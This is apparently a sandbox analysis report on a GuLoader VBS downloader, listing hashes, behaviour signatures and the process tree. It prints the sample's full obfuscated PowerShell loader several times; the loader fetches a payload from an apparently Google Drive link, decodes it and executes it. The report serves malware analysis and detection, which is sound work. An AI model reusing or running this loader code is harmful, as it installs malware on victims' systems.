Analysis

  • max time kernel
    147s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/09/2024, 02:25

General

  • Target

    ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs

  • Size

    32KB

  • MD5

    e198fb2a66ebacac2d2a06c6d39b578c

  • SHA1

    ac1353658fffdfba77beaa6ce1c42254ba02346f

  • SHA256

    ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b

  • SHA512

    4c28d4eee277d495d2596eeab0841933ac84f5f72b12f64d9281b4023f7e9c32f22d2368bb634252fdcac4f2b79b5cfe32cdbff015f4dc8a2c6f6acdb1317fe5

  • SSDEEP

    384:3PA0Xp74bQBupq5CMat1f9wxdaW+e9FfXpcHIBSi8g:/bFsq5CHePaWB9FfXp9Si8g

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request (3 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTPs, 2 IoCs)

    Using powershell.exe command.

  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
  • Suspicious use of NtCreateThreadExHideFromDebugger (2 IoCs)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  • Suspicious use of SetThreadContext (1 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoCs)
  • Suspicious behavior: EnumeratesProcesses (3 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoCs)
  • Suspicious use of WriteProcessMemory (23 IoCs)

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ba44e394e0d9dc4fe9d15a2297f8ecbc3affb80100003b5c57898269261b311b.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? 
BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. 
eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. 
AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi 
');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2236
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Microchip1.Ana && echo t"
        3⤵
          PID:2900
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c ^"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? 
BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. 
eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. 
AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N ss+Sempe+Anako%tufta$ConcoANdbref A prt Indhrd nceyYpur kFlo inSideripokalnMetacg Soris soft.NykalcTroggoAfhrdu ruen P.eftDdema ') ;$Monopoliseret=$Aftryknings[$Correspondentship];}$Strafferegistrenes239=332230;$Hundehvalpene=29477;Graenseprovins (Ferulaceous15 ' und$KonkugMa.lolVirksoPapilbN,geraPolyhlB.neg:UvsencEnormaAgenduLimstd paleaSt mmeBlomk Aztec=Doll oversGPlen e VisntTusin-BradyCIndskoCurumnSp totBenzyeTronanAffaltHeau, Hofso$RntgePP eria HorisSagres ndera ScrunRarert RrbleRealirGi,penD ooleDownhsstudi 
');Graenseprovins (Ferulaceous15 ' olon$ Kistgstavrlt enso OverbDaugha ScaflTawny:dubleTNoveliSkolelUdtrksc,ppetM gilr,ygosa Ber.nTid tspedompsaturo ComprC nchtfund eSkader Grooe ElecdPyreneAssev eko=gui.e Frugt[ShlumSBlindyDreams Prect CotteSupvrm Pare.TransCStipeovid,rn BetjvImpereTabitrTe sttB wal]terri:Isbjr:.onpaFglacirGuachodi tomBur eB ,orda MurbsUspileTauto6Anti.4SisseSu,bectPam.hrMov eiln denAdamsgUrino(Udsm,$Sectic ForsaOlieruStil dSa loaGrayceCappu)T,pab ');Graenseprovins (Ferulaceous15 'S.uds$Portrgunclel JudooAntipbBran.au ragl oble: M,slNT gstoBro.bn DictrI.tegess.nmtLak fiZafferUdstuePrognmUn.lueS vtanDictrtSyste Komp=Polye .hsde[klub S EtioyBordksYdendtStigbeDatasmUdgiv.Arro.T d ngeFravrx Rob.tPum e.FrnutEAutisnN,urocAno ooPh.red atoviGyl,enTrafigPeakk]Canke:misso:bl mmAMenupSOver CsituaINereiIbedri. EvanGVarmheKlosetPotteSFoliet CamorAndroiD natn Sporg nond(Fiske$AsleeT AfriiIn,erlNecrosHek,etFrugtr.paalaReturnClimas c sppG soloA tegrravnetTelefe GaterKosteeFo madAtamaeSkden)Oprre ');Graenseprovins (Ferulaceous15 'Tuj.e$PhagogSubselUdv,do besobUndera MccalKarto: porSPaatrtSvaleoNikanvNonintnight=di,co$AntihNOpby oAr,ejn s rerE soreMarketSisteiLuigirDe bieRuttemGgegue CottnRiskrtRecus.OwrehsAkkomuVar ibEmi asPre,atridserDecori.olitnOverdgOutwo(Prior$pastrSArubatRusserSfreraAnticfSjlegfRo,ane ChanrYokere Pigwg ,edkifupmasAnalot TillrS dwaeRavnenNondeeUgen sElekt2 Tote3overu9,ilow,Humfr$galerHSkriduBidi nphiltdRivebeAfdelhUntinvKbstaaUlfhilant,qp,ynthedagsonEstiveo kal)Lo ke ');Graenseprovins $Stovt;"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2588
          • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Udmattelserne Omkredsene Sekstanters Registermrkernes Befalingsmndene Oprikkerne Momenters #>;$Lynlaase113='Aelodicon';<#Sildens cafeliv roid Pagesize Haanenes #>;$Semipractical=$host.PrivateData;If ($Semipractical) {$Etymologiseres++;}function Ferulaceous15($Mesodevonic){$Eres=$Mesodevonic.Length-$Etymologiseres;for( $Silkworm=5;$Silkworm -lt $Eres;$Silkworm+=6){$Ablatives+=$Mesodevonic[$Silkworm];}$Ablatives;}function Graenseprovins($Acetation4){ . ($Accosting) ($Acetation4);}$Huntswoman=Ferulaceous15 '.ujonMHatt o al,mzPhenoi Aktil ColllSpadaa Unca/indsa5Aflsn.Vik r0P ess Paast(YarelWImi ai FrisnQuartdpos soTilbawVin,esSlegf g.schNFlintT kti Lutze1Aarss0 Fab .Dumri0,ovov; Virk TenuoWSonaniF dign alt6Wante4Brneg;Scree opblxUnder6Genst4Forgr;Trans AgricrKamervPlan.:H,pta1el oq2af.in1Subsi.irre.0 V lu)Unogl OrdklGmugieeUs igcadelsk Re.fo Ind,/Samse2 Blom0 Inve1Xrwor0Ammun0Lystr1Sphe 0 Padd1Udlsn ransF TaariDagabrslot eElainfNonu oElectxEndwa/Dundy1Galat2Udtrk1 Regi..riks0Res,g ';$Uncounterfeit=Ferulaceous15 ',dtruUCharlsPhiloESonorr U ef-PrudeaHudorG.natoeDextrNAdresT Data ';$Monopoliseret=Ferulaceous15 'OmdoehFilmet StabtOutstpHyp.isSexdm:Blodp/ Unpa/DilitdDoctrrMorfoiAnsigvThaumeKatol.karrigApporo Eksto Coung LasclAr hbeEnd,r.Nonv c bilsoIllegmOpkas/ W aru earnccoun.? 
BolceRigtixAfgifpForraoEnticrheralt ,aml=u.dendP raloV.asawKn denScintlFunktoEks ea taskdHypoz&E ucai UnordVgkon= Over1PheneKUnd ry JereOUnendO.ysekRaktiei mimiMInddrESvolvR Pe cmUppbaR Len 1mono TSextix entek Pri EustraYMinim7Tweedv S.il8JurisS P lygQuin.6S.iseVSubjuY AcartObstr0BinitrausgeuKorthQE gerJCholaxdammi ';$Uretfrdighed=Ferulaceous15 'Cotic>Hotel ';$Accosting=Ferulaceous15 'KikkeIFlitwEUnappX R.st ';$Ectal='Constrainingly';$Pienanny = Ferulaceous15 'Ac ene huslcd rmahSchapo gerf Kreat%Buksea AnpapForespgarned bonna.lutotTwinbaBacte% Iso \NepheMBlg.biTorbjc chatrBndeloEnkesc SimuhTr mbi Fakkp ener1Flles.ChiviATrskrnVueruaA.bet Desir&Amoul&.lisi Ano ye PolicL dighPa tsoBinau WatchtNring ';Graenseprovins (Ferulaceous15 'Kevel$ yoplgNo trl N.nto .nisb CyklaOpretl Skol:FangoFForebi HardxpasiluGtepapCoole= onsi(So,ricMisfom ndsvdLuder Unadd/OptagcU vne Ernri$H useP,irmeiAdaiveA eyrnUmpedaEmbarnMortanReeary S,ap)Ar,bi ');Graenseprovins (Ferulaceous15 'K.rri$AfhaagGravhlUnweaoVindib ReliaHe eblStyrk:VisorAC.inof CommtSte.srStupiy Ba nkPlumen anoriNu linTrishgOutlesMicos=Ansv $ Un,iMBodiloHikulnJetmao buckpalertoS,vvrl Pr.riDiamasK.taleSept r Dyspeund rt mbil. rmeosVeallpPlasml ObseiEnchatAffek(Aadse$ TyksUeuph r Smuge DavitAugitf DivirS.attdF ssiiPaletgBordlhKonsteCr,tidSulf )Anven ');Graenseprovins (Ferulaceous15 'Incip[Dil tNTilbae SviptOstra.EmperSLovtieCushir esilvHomoliPongicHoff eMorb,P Barbo PoniiMusclnknarrt Thr.MkjestaCensunFre faUbnhrgord,eePilchrstaal]Unq.i:Unfel:IndivSsemi eAt,anc Variu UnderStenriImpu.tWilfuyDor iPPerperSei.eoBaj dt Egoio ofecUropfoPuc elNee l Om,et=Floki high[ NathNarianeUnloctKlini. 
eedmS metaeTeoricForuruU clarT.geriSolvitmandayMonofPM.nthr ovruoW eelt Mrteo Lat cCarmioafreglAlfaqTInf rySamlepU cireXe,ox] K,ra:Aniso:BarytT BrnllKonststrans1 Forb2.uffl ');$Monopoliseret=$Aftryknings[0];$Phyllamorph237= (Ferulaceous15 'Bailm$ pariGButeolStatuOTubipBReinvaKrftsLTurlu:Koin,IBelnnn.ekveHUnrecaOrto L DugpeRab ir KobbEDilatsUnadm=NideoNHandfEProduw Spid-bundgo CaneBEvaneJ PodaeP.ojec ntrt avty K llis Disky Becls Metat Betee dlgsMspek .Studin Vid ELa.tst.katt.PonerW Ci lED.forBPlataCtft nLVirkei TokoeBv,esnFrithT');$Phyllamorph237+=$Fixup[1];Graenseprovins ($Phyllamorph237);Graenseprovins (Ferulaceous15 'S ksm$RespoIsup,rn Cri hKildnaArbejlDiocoe UnglrFllese RanesSk ff. onseHAfsvieNummeare rod ButieHydror frossCryst[A ton$Prot U KrslnVeligcO erio rhvu Tvinn.ilsat.horeeFlaglrAxlikf mpate PigeiAgonitTv,ng]Pharm=Droge$Ega iHRazoruP ntenPant tMoldisDesilw rticoSpagem ArchaMedi nRegna ');$Unassassinated=Ferulaceous15 ' Osob$ CortIMellen SymmhPo tuaAl uilAftrkeColorr KongeFrkkesOpula. 
AphtDHaiveo Hyo wT.temnafgudlKejseo,ivska SldedLevogF PentiWrithlUn ere Unde( atab$StortMDuopooJulian,uskioBigaepskvadoVoldtlOvertiImpelsOsmane Aut raut,cep nsatClutt,Har.o$UlotrPUdtr,a Percs Van sSe,boafaceln KrlitSadomeTi wirUbev n.ilkle UnthsF rba)Clois ';$Passanternes=$Fixup[0];Graenseprovins (Ferulaceous15 'Halle$DvnldgTherml RundoRustib O ttATerapl Afgr:LemonHPtyalAGunsmAUl,lifHubsssUnexp=preli(Buc eT BanceH,abasTakletSize - i,dePTiffaa Epo,T Kon hAchil Forkr$Mis,epThor a Sk rS SymbSBlodfA.ecimNSupratBemaeEOversr SubwnMoo nE EnersG,uss) stri ');while (!$Haafs) {Graenseprovins (Ferulaceous15 ' Tils$TilregDrueslSa rio DybsbB.lsaaPsoralCanth:pseudP Bom rPrereeGenbrq TilduSe,ime peralB.gen= Hy o$Danget Chagr Co.duTil aeUr nv ') ;Graenseprovins $Unassassinated;Graenseprovins (Ferulaceous15 'HanebSYndl tTarata Fri rCorditMow d-ForudSSylvil Gge ePa.rie .mbep kse Paren4U son ');Graenseprovins (Ferulaceous15 ' Thor$OpaqugHa idl F,ulorsonnbBuketaHabillDebat:SprinHTi rgaGa ldaAa skf Regis Ekss=Mirak( poteTKonfieFors sIdematUnfri-ReenlPL eseaGurnetK mpkhPaxiu Accol$Inv lPA lisaE,bles OrbisHygroa Udt nDel ntUdfrde U rer eaksnsmagse RespsUnder)Or.de ') ;Graenseprovins (Ferulaceous15 ' Bide$Dob egIn ralAttrao Bleab SydvaBrummlSpiny: UltrC Mot.o Strir,narerStutteT otssPatinp CabroAd umn loakdfourre tonnPrinctP efusSlatihSamariD gerpGenet=Reli $SytilgTaarnlStoicoSpattbDecena Skutl Lor.:DebugPL ncaoOverelLevesyP.akkiR ndedRasurrFur aoUnimps U,diiBia,rs N 